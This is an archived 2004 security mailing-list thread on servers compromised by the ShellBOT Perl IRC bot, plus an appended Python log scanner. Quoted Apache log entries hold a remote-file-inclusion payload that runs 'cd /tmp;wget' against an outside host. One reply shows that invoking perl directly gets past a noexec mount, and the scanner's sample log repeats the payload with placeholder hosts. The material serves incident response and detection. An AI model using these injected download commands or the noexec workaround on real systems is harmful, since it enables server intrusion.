Re: Systems compromised with ShellBOT perl script - part 2
From: Meder Kydyraliev (meder_at_areopag.net)
Date: 10/20/04
- Previous message: security_at_kemhosting.com: "re: Systems compromised with ShellBOT perl script - part 2"
- In reply to: security_at_kemhosting.com: "re: Systems compromised with ShellBOT perl script - part 2"
- Next in thread: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Maybe reply: Dave: "Re: Systems compromised with ShellBOT perl script - part 2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 21 Oct 2004 01:15:37 +0600 To: security@kemhosting.com
Here, have a look here:
[meder@beastie /]$mount|grep tmp
/dev/ad0s3d on /tmp (ufs, local, noexec, nosuid, soft-updates)
[meder@beastie /]$cat /tmp/test.pl
#!/usr/bin/perl
print "Hello world\n";
[meder@beastie /]$/tmp/test.pl
su: /tmp/test.pl: /usr/bin/perl: bad interpreter: Permission denied
[meder@beastie /]$perl /tmp/test.pl
Hello world
[meder@beastie /]$
On Wed, Oct 20, 2004 at 12:04:36AM -0500, security@kemhosting.com wrote:
> This thread is a couple months old, but I'm having issues with this hack, found
> it in the archives and thought it'd be helpful if I 'resuscitated' it. See
> bottom of email for rest of thread.
>
> Today, hackers used the ShellBOT perl script to bring down Apache and start up
> their IRC listener. They (somehow) copied it into /tmp and executed it. This
> confuses me because I have my /tmp directory mounted rw,noexec,nosuid. Does
> Perl somehow bypass this?
>
> While the script was running, I ran lsof and found that it had recursively
> accessed all my (virtual host) httpd logs (probably in an attempt to delete
> it's tracks = the reason I can't see how they copied the script into /tmp)
> which are owned by root. this is also confusing since the process the script
> spawned was owned by user apache.
>
> Some info on my box:
> Redhat ES kernel 2.4.21-9.0.1.ELsmp
> httpd-2.0.46-32.ent
> php-4.3.2-11.ent
>
> Anyone have any ideas on how this can happen? Mainly the executing of a script
> on a noexec mount! Obviously I'm not a guru, so it's probably something simple
> - so please, share!
>
> Thanks,
> Ed
>
>
>
> Kirby Angell wrote:
>
> > Yesterday we noticed a funny looking Apache log entry. It contained:
> >
> >
> http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2
> >
> > in the Referer entry. The actual HTTP request was innocuous, but the
> > Referer entry is not. I have been in contact with the owner of the
> > computer that was the apparent target of the attack and he reports that
> > the "index.php" page properly sanitizes its variables to keep this from
> > working.
> >
> > The attack attempts to trick the server into downloading and running the
> > given perl script, ".egg2" in this case. I retrieved a copy of that
> > script and found it configured to log into an IRC server
> > (irc.mzima.net:6667). Once the script is logged in, it joins the
> > channel "#datalink" and then waits for private messages from its
> > handler. The script can perform limited portscans, denial of service
> > attacks, and can run shell commands as whatever user the compromised web
> > server was running as. The script hides its identity by changing its
> > process name to "[httpd]" so it looks like one of many server threads.
> >
> > I logged into the IRC server and joined the channel to find 62
> > compromised systems listening. Unfortunately I was noticed and now the
> > channel is by invitation only. I have notified as many of the
> > administrators for those systems as could be identified from whois
> > records. I have also notified the operators of the IRC server.
> >
> > The IP address of the system that set off the original inquiry is
> > 63.227.76.25. The admin of one of the compromised boxes has found that
> > same IP address involved in their attack too. The Apache log entries
> > from their system look like this:
> >
> > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /popwin.js HTTP/1.0"
> > 200 195
> >
> "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
> > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
> > Firefox/0.9.1"
> > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET
> > /images/l2_thinkInsideBox.gif HTTP/1.0" 200 1711
> >
> "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
> > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
> > Firefox/0.9.1"
> > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /images/l2topbox.gif
> > HTTP/1.0" 200 2576
> >
> "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
> > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
> > Firefox/0.9.1"
> >
> > I would like to find if he used other IPs, but so far I've only had a
> > few responses from admins of the compromised systems. All who responded
> > were happy to provide log entries though.
> >
> > This sort of script shouldn't be terribly difficult to spot. A "netstat
> > -pan | grep 6667" will show its presence while running. Unless some
> > other compromise is used in conjunction with the script, the cracker
> > will not be able to install any sort of rootkit to hide the script's
> > presence.
> >
> > --
> > Thank you,
> >
> > Kirby Angell
> > Get notified anytime your website goes down!
> > http://www.alertra.com
> > key: 9004F4C0
> > fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
>
> ----------------------------------------------------------------
> This message was sent using IMP, the Internet Messaging Program.
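The thread's two practical points are that a noexec mount only blocks the kernel from executing the script directly (running it through the interpreter still works, as Meder's transcript shows), and that the injection itself is visible in the Apache access log, where the downloader command appeared inside the Referer field of otherwise normal requests. The following is an added example written for this archive page, not code from Meder, Ed or Kirby: a small scanner for Apache combined-format logs that flags any query parameter, in either the request line or the Referer, whose value is itself a remote URL (the remote-include pattern) or contains a downloader invocation. The log lines, hostnames and IP addresses in the sample are constructed placeholders, not taken from the thread.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache combined log format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|fetch|lynx)\b")

# Constructed sample log, in the same shape as the entries quoted in the
# thread but with placeholder addresses and hostnames.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Aug/2004:23:38:57 -0400] "GET /popwin.js HTTP/1.0" 200 195 "http://www.example.com/aboutus/index.php?page=http://bad.example/cmd.txt?&cmd=cd%20/tmp;wget%20http://bad.example/.egg2" "Mozilla/5.0"
203.0.113.7 - - [30/Aug/2004:23:39:01 -0400] "GET /index.php?id=http://bad.example/cmd.txt? HTTP/1.0" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Aug/2004:23:40:12 -0400] "GET /aboutus/index.php?page=contact HTTP/1.0" 200 2048 "http://www.example.com/" "Mozilla/5.0"
"""


def query_params(url):
    """Yield (name, value) pairs from the query string of url, percent-decoded.

    Splits on '&' only, so a ';' inside a value (as in 'cd /tmp;wget ...')
    stays part of that value instead of being treated as a separator.
    """
    try:
        query = urlsplit(url).query
    except ValueError:
        return
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def classify_value(value):
    """Return an indicator name for a suspicious parameter value, else None."""
    if value.lower().startswith(REMOTE_SCHEMES):
        return "remote-url"      # remote file inclusion: a URL where a page name belongs
    if DOWNLOADER_RE.search(value):
        return "downloader"      # shell text fetching something, e.g. 'wget http://...'
    return None


def scan_log(text):
    """Scan combined-format log text; return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at fields
        parts = m.group("request").split(" ")
        request_url = parts[1] if len(parts) >= 2 else ""
        # The payload in the thread sat in the Referer, so check both fields.
        for where, url in (("request", request_url), ("referer", m.group("referer"))):
            for name, value in query_params(url):
                indicator = classify_value(value)
                if indicator:
                    findings.append({"host": m.group("host"), "where": where,
                                     "param": name, "value": value,
                                     "indicator": indicator})
    return findings


def hosts_with_findings(findings):
    """Sorted list of distinct client addresses that produced a finding."""
    return sorted({f["host"] for f in findings})


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['host']} {f['where']:8} {f['param']}={f['value']!r} [{f['indicator']}]")
```

Running it against a real access log is a matter of passing the file contents to `scan_log`; the scanner reports the source address alongside each hit, which is the detail Kirby used to correlate the same attacker across several compromised hosts. It is deliberately narrow (only query parameters, only two indicators), so a match is a lead to investigate, not proof of compromise.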